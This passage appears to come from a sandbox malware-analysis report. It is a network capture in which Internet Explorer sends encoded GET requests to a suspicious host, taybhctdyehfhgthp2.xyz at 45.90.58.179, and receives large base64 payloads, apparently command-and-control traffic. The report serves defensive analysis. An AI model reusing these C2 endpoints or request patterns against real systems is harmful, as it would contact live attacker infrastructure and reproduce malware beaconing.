4b 35 45 4d 4b 41 6a 38 75 65 45 4f 70 66 79 6e 54 53 6b 4c 68 61 52 43 6b 5a 31 48 65 2f 34 59 7a 4e 38 41 58 31 6b 50 45 73 4c 2b 71 47 41 69 41 6c 51 50 45 54 62 4c 65 72 36 48 61 2b 76 66 77 69 5a 50 34 41 58 55 33 77 49 42 45 62 78 48 72 67 6e 4e 2f 47 67 38 66 36 33 47 6d 33 38 42 66 52 68 50 77 59 39 6a 79 47 52 34 42 56 50 35 78 39 4a 66 43 32 35 6f 61 74 2f 6e 57 35 4e 39 68 73 5a 4b 34 48 33 6f 64 71 52 4f 75 44 59 31 53 4c 76 6b 42 64 57 72 65 54 42 78 75 55 37 72 67 34 2b 45 6c 41 45 6c 52 7a 52 70 48 37 63 67 52 50 72 32 4a 7a 47 35 79 51 55 36 55 34 38 51 31 6f 6b 44 31 4c 42 33 7a 6b 66 46 67 74 4d 46 35 6f 68 43 56 70 72 38 4d 54 37 51 75 34 51 50 38 73 6e 50 Data Ascii: 3a5c0T7PCF+F1JUKATbbsknU2vXSLW0pETJVizQ+Dh5EMfs7xEfyF3KHQiSqHzUhC+eOe4xOmktxF8hkINPAyGwtLuxjzQUX0dOlxRhl2IyMqjlRkSyVOerucVlI3u65bpj0OmRvCWG8Jq+L3tJtOv1tBtGZXZBluy2p4TVTWgpPzOQwvm0rhVsOHbxDKLzkY6MP2R2GpP9xqBRF4gz0HtSMXjwDNwqFcI24Fb+1+dse5iLDfQyB5q73am9aRg6tuCqeSGPNdu0DorC+e657Bk2iWfKNrEJG43vJN+hE0oL7iv41LP673aKA5l3bIHoFwL0Ox7jiH7Z6RNa7B+8Bfm4QBfN1h0U5uGsehqxzVH3FeDwOkBzuC9jbJzwLK8a+jIgQSJRmMTCr23yggFMBuk942LWREFJyXW2ReGa8acuyzT6UWZ5hOXnyXTCFa9HvLqrV6AtVlxb4F74IQcyPo6MJ/XltWRnDfUaMboNmQXApLV9IJfJt6PU7zfxY7HFMLhYIbzaaCucqXW3awk0ND1T0n6N6Y5WDDoiNzKdQJKinH/KsK2q/0+4iSB1S3cP5Jw1THwOE7tkwTqq/kN3ec7dm8uG0pLd+ciMmBhDA1LxilSrj6mdoEpoUzhQ0cIkiYznLIOAuKLJvCx9K2l/pX5vhRGEI4WiKms34NvxDw1BrppeHfq6m5bZJ+jGnWQ3VTC9hp+zb0kPQAJ8aomsK5EMKAj8ueEOpfynTSkLhaRCkZ1He/4YzN8AX1kPEsL+qGAiAlQPETbLer6Ha+vfwiZP4AXU3wIBEbxHrgnN/Gg8f63Gm38BfRhPwY9jyGR4BVP5x9JfC25oat/nW5N9hsZK4H3odqROuDY1SLvkBdWreTBxuU7rg4+ElAElRzRpH7cgRPr2JzG5yQU6U48Q1okD1LB3zkfFgtMF5ohCVpr8MT7Qu4QP8snP
Jul 6, 2021 14:31:07.671462059 CEST	11424	IN	Data Raw: 70 72 46 6b 52 6e 74 65 4e 31 71 34 6b 53 6b 68 4d 51 78 4e 2f 50 34 44 71 52 45 2f 6e 54 45 71 41 48 4c 48 41 6c 32 2b 45 4c 6d 49 33 51 52 42 52 47 4e 6a 53 65 63 72 4b 73 62 45 71 4f 53 4c 39 70 75 70 42 6e 6d 71 34 67 46 6e 66 74 6b 30 61 34 Data Ascii: prFkRnteN1q4kSkhMQxN/P4DqRE/nTEqAHLHAl2+ELmI3QRBRGNjSecrKsbEqOSL9pupBnmq4gFnftk0a4yQEkxphjhr12paTp3m6LC7H1HP+1MMCpo9tvgu0ogeyNvtRpW/ywVMxJrWS84trZHHPoz55qf56RD275lvuEOo9p3lWdqGyHoI6gVDvotLEtUu4MwlYm1E5yQMU1OZj0uN8RmMMwTy5P8cXm6PQc/Je3n4N0Boys6
Jul 6, 2021 14:31:07.671487093 CEST	11425	IN	Data Raw: 64 50 45 59 6d 75 63 65 58 56 75 2b 65 73 4c 50 47 68 2b 6e 77 61 65 6f 59 61 39 46 30 52 52 75 50 53 30 50 71 6a 70 6d 51 77 7a 35 49 4f 74 72 4d 30 31 66 70 71 51 30 67 4a 6e 56 31 73 72 4e 53 33 7a 4d 65 70 59 35 6b 58 67 57 56 44 37 6f 64 2b Data Ascii: dPEYmuceXVu+esLPGh+nwaeoYa9F0RRuPS0PqjpmQwz5IOtrM01fpqQ0gJnV1srNS3zMepY5kXgWVD7od+CbrqOwkR/oeaJwkXtQawDvDLXVjfJwBFfn/9z8ZKBvj5ql3TqU+OXaaM2TEnn8sirqG9ZSopwcY09CSMCNEM25pEDDXHyka8ktDmpOhVq1tEW3/uPqk2piO0hKU3aPiY+e8bshNXDXXiBL0e3hF9fArYaTroGybTW
Jul 6, 2021 14:31:07.671503067 CEST	11426	IN	Data Raw: 39 52 69 52 45 66 39 43 67 46 56 6e 68 70 39 4c 79 6a 2f 37 72 50 4c 75 2f 59 4f 41 4b 39 4f 42 65 58 2b 54 43 6d 74 68 6a 39 54 48 51 44 62 6d 36 41 45 48 58 48 35 4b 6c 34 50 59 58 73 6d 63 4c 46 6d 79 6a 39 4d 62 4e 63 36 42 73 37 69 51 46 4b Data Ascii: 9RiREf9CgFVnhp9Lyj/7rPLu/YOAK9OBeX+TCmthj9THQDbm6AEHXH5Kl4PYXsmcLFmyj9MbNc6Bs7iQFKFzGWFcamhuY/YF/7bKjK1s7JRXcdUGiSMQXVC2+ydj48vE+TgqUgt3LLwMVwm6zsBUlKNiqzOnDhITfuYYHqYPy5RfC5dNzEnVcWLINxRdIwpWSMDjosAxHYJ6z5J9yBaiQKzqDc83j8nSRFwMi/ya7pJoHk41szF
Jul 6, 2021 14:31:07.671525955 CEST	11428	IN	Data Raw: 70 6c 39 2b 37 5a 57 31 35 74 58 63 45 79 46 62 52 73 64 67 30 54 63 56 6c 7a 7a 35 45 4a 65 64 48 73 78 58 43 78 4b 77 73 2b 75 37 42 6f 43 6c 46 68 2b 59 4e 6d 68 46 39 44 2b 77 72 78 44 43 48 63 65 74 77 32 47 5a 31 49 2f 32 41 55 35 45 56 2b Data Ascii: pl9+7ZW15tXcEyFbRsdg0TcVlzz5EJedHsxXCxKws+u7BoClFh+YNmhF9D+wrxDCHcetw2GZ1I/2AU5EV+g+SETloCBLto19Crb5vVqDz6/QVn2Kuyw3n7rqUuMBQprwF+wMgjbtbZKWQmvjxUkqve0LOpwcO3eYFgmYz9RFSkR6eCsTGTEA5HWR4oBVx0JosioSwKVmVjKacKHUDlsYWnGKr8QM40rg1JbkpSUZ2annA+GPee2
Jul 6, 2021 14:31:07.671550989 CEST	11429	IN	Data Raw: 6e 52 72 54 31 51 5a 4b 63 38 43 42 4a 50 2f 62 73 4b 75 65 64 77 75 43 36 46 6c 54 46 72 32 47 76 34 41 73 4c 6a 53 30 47 61 51 57 78 5a 54 4b 59 68 41 63 64 71 33 30 35 58 42 5a 37 6b 61 33 39 45 64 6e 68 4e 57 52 77 46 2b 77 5a 66 5a 2b 2b 4e Data Ascii: nRrT1QZKc8CBJP/bsKuedwuC6FlTFr2Gv4AsLjS0GaQWxZTKYhAcdq305XBZ7ka39EdnhNWRwF+wZfZ++N4+L5wafyW44f5c24ppMIjUNcb2b2kx5GtPXiZ0X9/PJ8W5qKPlE8aNDdAINLxYUGlvFx8RkRsU6fWzM6rOKW1QpveU81D3HqBBUWMQr5hYrRc4E8X7r/DalFZinLcVJbupgy6EpMBhAL8+Q1jIw5JsG21NXDBSTQJ
Jul 6, 2021 14:31:07.671606064 CEST	11431	IN	Data Raw: 34 63 58 67 48 6b 39 59 4d 65 2b 63 55 46 53 77 72 44 2f 2b 38 37 44 58 66 35 59 46 44 62 30 46 7a 68 45 53 6b 51 55 7a 4d 34 30 46 45 45 52 2f 6e 4c 42 63 77 64 6b 38 6e 4f 45 45 74 68 43 43 49 32 5a 48 48 67 5a 48 31 39 58 57 69 6c 75 76 67 43 Data Ascii: 4cXgHk9YMe+cUFSwrD/+87DXf5YFDb0FzhESkQUzM40FEER/nLBcwdk8nOEEthCCI2ZHHgZH19XWiluvgC5Yy2b3vU4Zkxi6licf0HHG3OhcPEBKQZPaT09yhKrXUZhWhKJ3K//SICSWhyiRZv1q2bbJC/eJj9SaYG3v2oeC82bkNPi7xA/F3cOqIfgQPXXRdKUheZDaZd9aD7yC3xGy5CINHFPNHBkxhh4WvlB87hj4yo0WBhp
Jul 6, 2021 14:31:07.671629906 CEST	11432	IN	Data Raw: 63 56 72 69 68 7a 32 2f 69 4c 65 5a 38 4b 36 37 4c 64 4b 55 61 64 76 6b 5a 42 56 6f 55 74 6b 4d 65 42 78 6f 71 44 68 76 36 73 56 79 2f 75 6b 4b 32 74 4a 35 4d 55 66 4f 39 76 48 58 69 30 33 48 37 4f 43 74 35 65 47 75 58 41 31 50 73 7a 32 77 36 57 Data Ascii: cVrihz2/iLeZ8K67LdKUadvkZBVoUtkMeBxoqDhv6sVy/ukK2tJ5MUfO9vHXi03H7OCt5eGuXA1Psz2w6WSl4zjnD9KBaBC5vxnH2xYp4sKkBzrAlSiB0hD4xZaXiizkIr9AZ268XkAojA1/rTaSXPHfZBIDCErsVQy95w55MXAqqTOKT0qHf9VX+n3tQ9guHT+7A5j4SjSHjV74bt+0eT2VnS0pVjE5YXAFkMGpBVlwGZ1WRcn
Jul 6, 2021 14:31:07.671654940 CEST	11433	IN	Data Raw: 47 56 7a 4a 6b 4c 6a 4c 34 70 49 4b 54 36 45 36 6f 38 41 36 4d 75 76 30 69 65 75 31 7a 38 4c 76 69 64 30 6c 32 6b 57 79 56 42 70 51 6b 57 56 61 33 73 35 6d 64 53 2b 4c 42 41 6b 49 79 56 36 57 4b 41 2b 59 52 6d 53 79 4b 72 74 6b 6c 6f 71 56 62 4d Data Ascii: GVzJkLjL4pIKT6E6o8A6Muv0ieu1z8Lvid0l2kWyVBpQkWVa3s5mdS+LBAkIyV6WKA+YRmSyKrtkloqVbMFwodpAOW/17xA+ABmBP4QRre1Bl+WwYgmK6mz5whN5Jn0FXZcOJB7HeBB218JKD2uCM5s/sMqwYO980SaHLq93uHuGBv/c0hVmTq2rb8jLHOb5xWOdjcRrWgruDJIZEJozZN26qQC3KaUJnM97d647k2Y+9tX2dLD
Jul 6, 2021 14:31:07.671679020 CEST	11435	IN	Data Raw: 72 47 68 62 53 59 4b 55 42 41 62 59 7a 35 6e 68 34 56 2f 4f 72 6a 71 69 70 4b 45 74 53 78 42 6c 64 30 50 55 68 4c 61 56 2b 79 43 6b 73 74 45 6f 79 48 37 32 48 70 43 42 33 64 47 4d 61 4c 2b 42 48 6f 2f 62 30 33 31 49 4c 34 2f 61 48 62 62 39 2b 67 Data Ascii: rGhbSYKUBAbYz5nh4V/OrjqipKEtSxBld0PUhLaV+yCkstEoyH72HpCB3dGMaL+BHo/b031IL4/aHbb9+gcn8tMj8SxjCDTVgPdfSOnaJVT4tEA2TcN9hLdu38YA6gWMi0V6QhLhI+qjY09dNXDav+CVarPbgfxA+7/FNtxe9eDsCMEt2fMc532NEC9aC7r/oZJsAnKMAOHGAP6wOFji0jlT1djOT9rZGS9/N5mfIQBGJlOEFgW
Jul 6, 2021 14:31:07.710284948 CEST	11545	IN	Data Raw: 53 73 34 6d 53 6d 61 6e 75 7a 6c 7a 6e 36 4e 47 71 66 48 63 35 57 62 67 38 56 6d 65 43 54 55 4e 49 78 35 38 50 74 68 56 5a 47 6e 2f 4d 54 48 6a 54 33 48 37 54 2b 46 35 4d 78 32 5a 66 38 48 6c 36 41 67 4e 43 73 38 37 33 33 75 72 70 4a 6d 56 2b 2f Data Ascii: Ss4mSmanuzlzn6NGqfHc5Wbg8VmeCTUNIx58PthVZGn/MTHjT3H7T+F5Mx2Zf8Hl6AgNCs8733urpJmV+/zFvVB20ClxCA7qbHp5CmusewLKhxaV3Fvr3DtqcGJ4mg2wbTKrD2+obxzC+uJ3ROCnRLYkHF+UPnCdakLarcp9X+idnKSjXVa613r4gI+d4eBOeyaczPaIFGjAtHmfRINSaG44JnaD+RgTyLdAMNUbPE7KLFqRax/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49884	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:11.355328083 CEST	11783	OUT	GET /jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:11.415927887 CEST	11786	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:11 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2460 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 65 68 58 6c 64 53 77 58 51 69 59 4c 61 47 7a 6e 51 4e 35 59 46 37 72 33 4c 2f 65 66 4f 4c 62 34 4c 6e 5a 31 6f 41 59 70 74 38 6c 67 50 47 50 65 2f 67 66 38 2f 44 47 54 62 56 36 6d 37 59 77 70 55 52 33 4d 57 6f 32 55 74 4b 64 44 6d 46 34 41 50 43 46 72 61 4a 52 45 77 6c 4a 57 6e 6b 6f 62 38 53 73 51 4e 4a 68 72 79 77 76 4b 71 77 2b 62 53 6f 6f 48 59 75 77 6c 49 42 6b 6e 4f 64 73 70 58 39 45 51 65 33 53 76 39 65 2b 4d 4a 47 7a 42 55 56 30 68 61 45 44 62 61 30 58 41 6b 4f 62 75 44 59 4e 52 6a 31 38 78 6e 4e 69 58 69 36 57 73 36 30 50 6a 63 30 2f 48 55 30 69 39 62 4c 52 70 52 67 35 39 53 54 6b 55 71 46 47 73 38 43 34 31 32 48 31 78 56 64 6d 63 35 64 32 76 72 72 77 31 57 37 32 36 78 64 78 4c 4a 62 42 35 50 72 59 69 50 6f 4d 41 50 31 59 4e 39 50 2b 4b 59 7a 6d 6c 4f 56 47 4b 65 49 76 66 69 4b 79 64 4e 37 61 78 79 55 71 35 2f 77 70 67 41 53 47 2b 2f 30 71 4f 41 61 30 6f 65 53 68 35 51 36 7a 34 4c 65 39 31 58 37 6f 34 32 6a 6d 4f 51 6e 69 53 77 63 2f 41 6e 59 66 6c 6c 67 45 4c 2b 58 5a 2f 69 6f 55 59 4e 69 62 4a 56 6f 58 44 36 65 69 58 4f 6c 37 4d 4f 4b 61 70 79 31 42 62 2b 47 79 77 7a 79 38 74 50 5a 6a 34 54 6b 7a 4f 67 2f 6b 44 6f 6c 43 7a 6d 4b 73 33 50 75 62 48 4c 41 42 34 65 6a 51 45 44 2f 38 66 51 51 6b 46 71 39 50 41 69 59 78 75 70 44 6e 55 69 43 58 67 39 37 76 41 51 42 75 53 4a 73 46 6a 39 6b 37 53 62 51 66 35 6c 72 55 46 54 32 39 6f 50 58 57 41 46 4f 2b 69 76 49 39 54 4c 56 53 36 47 4d 35 56 31 56 51 37 33 4a 46 7a 34 30 48 38 57 35 6a 33 6d 4b 44 73 2b 4c 6b 39 2f 79 70 4e 53 51 52 62 45 41 69 74 6d 49 30 4c 36 39 76 2f 4f 70 79 43 5a 66 77 32 62 4c 72 33 55 4d 6a 79 51 36 6a 63 34 37 32 75 52 54 42 6a 6c 75 6b 74 59 75 4a 4b 74 4f 78 6d 6c 30 6b 46 61 4d 35 4f 51 48 61 6e 43 4b 55 46 55 44 30 5a 45 72 34 31 4f 62 4d 48 67 66 54 4c 41 2b 47 56 51 41 43 32 4d 34 69 36 6f 52 58 62 33 2f 46 44 37 4f 37 71 36 49 71 6e 75 6e 55 33 57 36 78 6f 36 46 6b 6b 77 78 4d 77 46 61 39 33 54 7a 62 49 35 6c 55 36 75 59 6e 59 2b 6b 4c 59 52 51 62 79 54 46 56 33 5a 6d 49 70 4e 70 75 2f 74 7a 50 41 32 5a 41 6b 4e 32 53 4a 74 61 54 66 4d 4f 62 71 67 57 65 69 49 56 57 5a 44 49 36 59 5a 34 50 65 6f 59 56 47 56 50 54 78 56 6f 39 7a 56 57 65 35 58 36 7a 51 72 71 57 43 47 47 45 69 77 4c 5a 51 4c 45 78 76 6a 63 76 4a 35 2b 55 6c 77 36 4a 57 38 73 32 39 73 37 34 6b 63 38 56 6f 42 78 30 68 74 36 57 56 64 70 62 59 30 30 63 44 66 76 5a 6c 71 50 5a 45 79 44 6a 75 54 68 38 30 67 77 61 4d 30 52 54 67 69 31 79 61 78 2f 44 41 4b 34 30 63 59 37 57 6e 72 64 2f 53 6e 66 64 30 6d 51 68 62 65 6d 48 32 6d 63 73 53 43 45 44 6c 56 32 47 69 59 50 6c 46 6e 6f 6a 7a 38 56 79 53 52 7a 5a 75 42 34 39 6e 6a 76 38 54 76 72 69 37 48 65 57 53 52 6e 49 33 73 47 51 76 45 6a 37 42 4c 33 54 48 55 48 2f 4e 48 58 51 4c 45 4e 4f 71 5a 6b 49 63 78 4a 51 43 71 78 4c 48 6a 6f 66 61 58 65 47 4c 38 64 49 49 52 45 32 4a 32 33 63 4b 4e 72 2f 32 56 34 74 63 66 44 79 31 52 59 4a 2b 2b 6d 74 Data Ascii: ehXldSwXQiYLaGznQN5YF7r3L/efOLb4LnZ1oAYpt8lgPGPe/gf8/DGTbV6m7YwpUR3MWo2UtKdDmF4APCFraJREwlJWnkob8SsQNJhrywvKqw+bSooHYuwlIBknOdspX9EQe3Sv9e+MJGzBUV0haEDba0XAkObuDYNRj18xnNiXi6Ws60Pjc0/HU0i9bLRpRg59STkUqFGs8C412H1xVdmc5d2vrrw1W726xdxLJbB5PrYiPoMAP1YN9P+KYzmlOVGKeIvfiKydN7axyUq5/wpgASG+/0qOAa0oeSh5Q6z4Le91X7o42jmOQniSwc/AnYfllgEL+XZ/ioUYNibJVoXD6eiXOl7MOKapy1Bb+Gywzy8tPZj4TkzOg/kDolCzmKs3PubHLAB4ejQED/8fQQkFq9PAiYxupDnUiCXg97vAQBuSJsFj9k7SbQf5lrUFT29oPXWAFO+ivI9TLVS6GM5V1VQ73JFz40H8W5j3mKDs+Lk9/ypNSQRbEAitmI0L69v/OpyCZfw2bLr3UMjyQ6jc472uRTBjluktYuJKtOxml0kFaM5OQHanCKUFUD0ZEr41ObMHgfTLA+GVQAC2M4i6oRXb3/FD7O7q6IqnunU3W6xo6FkkwxMwFa93TzbI5lU6uYnY+kLYRQbyTFV3ZmIpNpu/tzPA2ZAkN2SJtaTfMObqgWeiIVWZDI6YZ4PeoYVGVPTxVo9zVWe5X6zQrqWCGGEiwLZQLExvjcvJ5+Ulw6JW8s29s74kc8VoBx0ht6WVdpbY00cDfvZlqPZEyDjuTh80gwaM0RTgi1yax/DAK40cY7Wnrd/Snfd0mQhbemH2mcsSCEDlV2GiYPlFnojz8VySRzZuB49njv8Tvri7HeWSRnI3sGQvEj7BL3THUH/NHXQLENOqZkIcxJQCqxLHjofaXeGL8dIIRE2J23cKNr/2V4tcfDy1RYJ++mt
Jul 6, 2021 14:31:11.415961027 CEST	11787	IN	Data Raw: 2f 6d 64 72 5a 4a 47 75 36 31 4b 37 74 5a 74 30 79 51 6c 58 53 37 4b 38 53 4b 74 6e 45 4a 6a 65 69 7a 6b 69 59 77 63 42 30 55 65 5a 56 6c 67 71 65 6f 31 2f 38 6b 75 56 41 30 4e 6a 54 76 47 4d 4e 32 33 46 43 2b 4d 33 69 6c 31 54 38 6e 37 5a 4b 63 Data Ascii: /mdrZJGu61K7tZt0yQlXS7K8SKtnEJjeizkiYwcB0UeZVlgqeo1/8kuVA0NjTvGMN23FC+M3il1T8n7ZKc44+djUayVI/op4pJ2ho/CgevvltNpiydA977+rhfW6qecYF914GIkD9lL43w6g+RXlEv+VNofGPOWkUwHp7NgmX1EkmzF5VnbiLDzjYsV2HAvW2rLUmnY3H25wJTXtvITM/t3mZlF6iCRMebU+R8vWKKFlRWRZp5A
Jul 6, 2021 14:31:11.415982962 CEST	11787	IN	Data Raw: 57 6b 45 72 38 4a 4f 4a 6e 52 57 51 4b 52 50 6b 73 42 78 6b 30 2f 4b 57 6b 6b 66 68 34 72 47 33 2f 78 55 75 6f 43 47 55 6b 6e 79 46 59 5a 77 6f 68 4f 68 6a 31 6f 50 4d 34 52 45 51 71 30 68 33 42 71 41 6c 79 77 69 7a 4c 76 65 70 56 63 41 47 57 4b Data Ascii: WkEr8JOJnRWQKRPksBxk0/KWkkfh4rG3/xUuoCGUknyFYZwohOhj1oPM4REQq0h3BqAlywizLvepVcAGWKJApsZZyB9AscV1drNtOwZXQUFcZy2nBHw6ngXHL/FywHGyCnITp2zY1z6Rxv1cXaqlTP6cdmRpLZyx3g=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49886	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:11.376338005 CEST	11784	OUT	GET /jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:11.434812069 CEST	11789	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:11 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 61 33 31 34 0d 0a 67 72 57 41 4c 4a 30 41 6f 52 72 79 4d 68 4c 6b 62 34 2b 35 66 4b 46 31 42 54 33 44 6c 56 75 33 6a 75 7a 45 48 61 77 2f 5a 76 53 45 53 6d 51 76 58 51 38 6e 6b 70 30 59 39 52 6b 64 57 67 69 7a 31 69 4f 4b 31 44 38 4e 55 72 39 69 5a 64 73 64 46 72 38 31 4a 6d 70 57 67 39 74 78 6e 64 7a 56 47 54 30 65 36 2b 54 42 59 51 45 66 63 65 50 51 59 6e 6f 75 51 33 6e 45 5a 54 63 44 75 52 54 63 56 56 4b 70 34 4d 76 79 6f 41 45 37 36 67 44 5a 59 5a 62 31 55 37 54 4f 36 67 57 46 35 78 47 61 45 59 44 50 52 68 58 36 4b 75 42 45 44 4c 6e 70 4b 4a 59 4e 78 6e 5a 2f 70 73 6b 35 5a 2f 78 69 72 55 51 75 71 72 35 6e 51 38 64 43 77 62 76 6e 49 61 2f 44 67 44 59 66 35 43 6a 67 64 73 77 6b 67 72 72 48 6f 34 71 30 37 6d 36 41 65 39 6d 42 2b 53 46 34 4c 36 71 4d 35 56 2b 67 77 30 61 33 4c 70 65 4b 54 75 57 53 79 33 31 6c 6f 76 6f 31 38 44 36 63 43 5a 49 66 4e 4d 30 79 4d 73 41 71 51 6a 78 44 57 30 59 61 53 79 56 65 4d 54 6a 75 36 74 76 76 59 79 35 6d 55 62 75 73 61 70 37 57 49 6d 41 57 6d 61 67 48 4b 6e 30 51 43 52 59 52 33 37 64 49 32 6e 73 70 58 31 44 4f 52 73 2b 31 35 51 62 71 62 4c 4f 77 73 67 4c 63 64 66 65 56 36 6b 77 63 48 44 68 64 34 70 4d 4c 4c 70 73 31 71 6c 41 49 53 4f 52 51 52 32 4b 34 44 36 4a 59 6c 38 58 71 31 4f 37 4b 55 67 75 73 4d 2b 72 4d 63 51 6c 39 76 42 6f 45 54 6a 39 70 53 74 68 61 70 39 32 41 6a 6e 52 76 69 7a 32 74 6e 44 2f 32 55 73 72 74 63 30 78 6c 32 5a 34 59 71 37 6d 30 62 6c 7a 59 4d 46 65 36 75 75 61 72 79 65 45 70 4a 64 50 50 42 61 4c 36 77 67 55 7a 39 72 7a 74 58 78 45 70 47 46 53 61 68 72 6c 33 4c 39 73 34 57 2f 36 57 30 66 47 56 4f 7a 6d 61 30 56 56 62 46 61 55 6d 47 32 45 79 51 7a 52 52 66 6f 42 6e 77 56 54 47 6c 76 51 45 31 71 5a 35 73 39 4d 6c 73 2b 53 79 42 6f 31 2f 35 33 68 6b 59 5a 70 31 6e 2f 4a 6a 46 78 6f 46 38 64 44 34 47 6b 77 72 37 4b 61 56 6a 77 35 35 4e 63 56 79 48 72 4d 49 7a 77 6a 45 6a 39 30 42 76 71 31 50 4a 6a 64 78 56 77 79 33 31 58 70 4a 6f 57 54 35 44 68 6e 2f 73 46 44 63 37 33 4f 31 65 59 71 47 58 4f 4a 37 66 73 2f 4e 33 61 62 44 2f 33 65 4b 63 7a 50 2b 73 66 71 70 70 53 77 39 59 67 54 52 6f 53 32 2f 7a 31 6b 71 51 4f 44 55 7a 41 43 75 70 49 34 66 63 52 63 57 43 6e 70 74 38 69 49 4a 45 7a 4d 48 45 39 6f 78 63 33 6e 66 62 67 47 6a 6d 39 6b 69 44 55 78 6a 58 55 79 67 44 61 59 6c 49 44 73 63 2f 45 39 52 51 47 41 4e 4e 6f 4b 45 67 6a 4c 50 45 47 56 73 64 74 57 45 48 63 6f 2b 33 75 34 5a 59 38 33 72 77 79 6e 4e 30 76 61 43 46 4e 4f 36 72 48 35 36 7a 6a 45 49 53 78 48 73 56 6a 6a 61 6e 6d 64 63 47 31 57 61 50 66 48 43 67 33 79 32 68 71 69 6c 54 61 58 46 37 2b 54 76 70 38 76 5a 72 35 4c 75 65 35 69 30 6c 46 53 6c 46 47 62 48 63 59 59 6c 44 44 55 4a 37 51 33 71 6c 6b 70 77 66 74 50 65 53 54 68 6b 30 61 66 65 72 30 47 77 6d 42 6f 47 48 58 73 41 42 51 57 33 79 50 4b 73 4f 61 33 57 37 79 2f 33 6a 79 62 55 53 6f 50 4e 76 4e 72 69 57 46 2f 65 44 30 61 71 63 6f 46 37 41 38 Data Ascii: 4a314grWALJ0AoRryMhLkb4+5fKF1BT3DlVu3juzEHaw/ZvSESmQvXQ8nkp0Y9RkdWgiz1iOK1D8NUr9iZdsdFr81JmpWg9txndzVGT0e6+TBYQEfcePQYnouQ3nEZTcDuRTcVVKp4MvyoAE76gDZYZb1U7TO6gWF5xGaEYDPRhX6KuBEDLnpKJYNxnZ/psk5Z/xirUQuqr5nQ8dCwbvnIa/DgDYf5CjgdswkgrrHo4q07m6Ae9mB+SF4L6qM5V+gw0a3LpeKTuWSy31lovo18D6cCZIfNM0yMsAqQjxDW0YaSyVeMTju6tvvYy5mUbusap7WImAWmagHKn0QCRYR37dI2nspX1DORs+15QbqbLOwsgLcdfeV6kwcHDhd4pMLLps1qlAISORQR2K4D6JYl8Xq1O7KUgusM+rMcQl9vBoETj9pSthap92AjnRviz2tnD/2Usrtc0xl2Z4Yq7m0blzYMFe6uuaryeEpJdPPBaL6wgUz9rztXxEpGFSahrl3L9s4W/6W0fGVOzma0VVbFaUmG2EyQzRRfoBnwVTGlvQE1qZ5s9Mls+SyBo1/53hkYZp1n/JjFxoF8dD4Gkwr7KaVjw55NcVyHrMIzwjEj90Bvq1PJjdxVwy31XpJoWT5Dhn/sFDc73O1eYqGXOJ7fs/N3abD/3eKczP+sfqppSw9YgTRoS2/z1kqQODUzACupI4fcRcWCnpt8iIJEzMHE9oxc3nfbgGjm9kiDUxjXUygDaYlIDsc/E9RQGANNoKEgjLPEGVsdtWEHco+3u4ZY83rwynN0vaCFNO6rH56zjEISxHsVjjanmdcG1WaPfHCg3y2hqilTaXF7+Tvp8vZr5Lue5i0lFSlFGbHcYYlDDUJ7Q3qlkpwftPeSThk0afer0GwmBoGHXsABQW3yPKsOa3W7y/3jybUSoPNvNriWF/eD0aqcoF7A8
